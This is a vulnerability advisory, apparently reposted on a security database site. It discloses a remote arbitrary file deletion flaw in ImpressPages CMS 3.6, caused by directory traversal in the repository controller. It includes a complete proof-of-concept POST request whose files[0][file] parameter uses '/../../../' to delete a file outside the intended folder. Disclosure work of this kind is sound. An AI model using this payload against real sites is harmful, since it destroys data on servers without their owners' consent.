ImpressPages CMS v3.6 Remote Arbitrary File Deletion Vulnerability

2013.11.01
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

ImpressPages CMS v3.6 Remote Arbitrary File Deletion Vulnerability Vendor: ImpressPages UAB Product web page: http://www.impresspages.org Affected version: 3.6 Summary: ImpressPages CMS is an open source web content management system with revolutionary drag & drop interface. Desc: Input passed to the 'files[0][file]' parameter in '/ip_cms/modules/administrator/repository/controller.php' is not properly sanitised before being used to delete files. This can be exploited to delete files with the permissions of the web server via directory traversal sequences passed within the affected POST parameter. Tested on: Microsoft Windows 7 Ultimate SP1 (EN) Apache 2.4.2 PHP 5.4.7 MySQL 5.5.25a Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2013-5158 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5158.php Vendor: http://www.impresspages.org/blog/impresspages-cms-3-7-is-mobile-as-never-before/ 12.10.2013 -- POST /impresspages/ HTTP/1.1 Host: localhost Proxy-Connection: keep-alive Content-Length: 387 Accept: application/json, text/javascript, */*; q=0.01 Origin: http://localhost X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.69 Safari/537.36 Content-Type: application/x-www-form-urlencoded Referer: http://localhost/impresspages/?cms_action=manage Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Cookie: ses819=k7e9hu9pk4ol4h9l0lbt5q73u1 g=administrator&m=repository&a=deleteFiles&files%5B0%5D%5BfileName%5D=readme.txt&files%5B0%5D%5Bdir%5D=file%2Frepository%2F&files%5B0%5D%5Bfile%5D=/../../../joxy.txt&files%5B0%5D%5Bext%5D=txt&files%5B0%5D%5Bpreview%5D=ip_cms%2Fmodules%2Fadministrator%2Frepository%2Fpublic%2Fadmin%2Ficons%2Fgeneral.png&files%5B0%5D%5Bmodified%5D=1381393098&securityToken=c029f7293955df089676b78af8222d2a

References:

http://www.impresspages.org/blog/impresspages-cms-3-7-is-mobile-as-never-before/
http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5158.php


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top